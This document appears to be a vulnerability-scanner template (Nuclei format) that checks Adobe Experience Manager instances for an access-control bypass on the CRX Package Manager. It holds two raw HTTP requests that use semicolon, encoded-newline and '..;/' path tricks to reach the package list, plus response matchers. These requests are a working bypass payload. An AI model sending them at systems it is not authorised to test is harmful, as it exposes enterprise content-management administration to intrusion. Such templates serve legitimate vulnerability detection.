id: aem-crx-bypass info: author: dhiyaneshDK name: AEM CRX Bypass severity: critical reference: https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/ tags: aem requests: - raw: - | GET /crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1 Host: {{Hostname}} Referer: {{BaseURL}} Accept-Encoding: gzip, deflate - | GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1 Host: {{Hostname}} Referer: {{BaseURL}} Accept-Encoding: gzip, deflate matchers-condition: and matchers: - type: word part: body words: - 'buildCount' - 'downloadName' - 'acHandling' condition: and - type: word part: header words: - 'application/json' - type: status status: - 200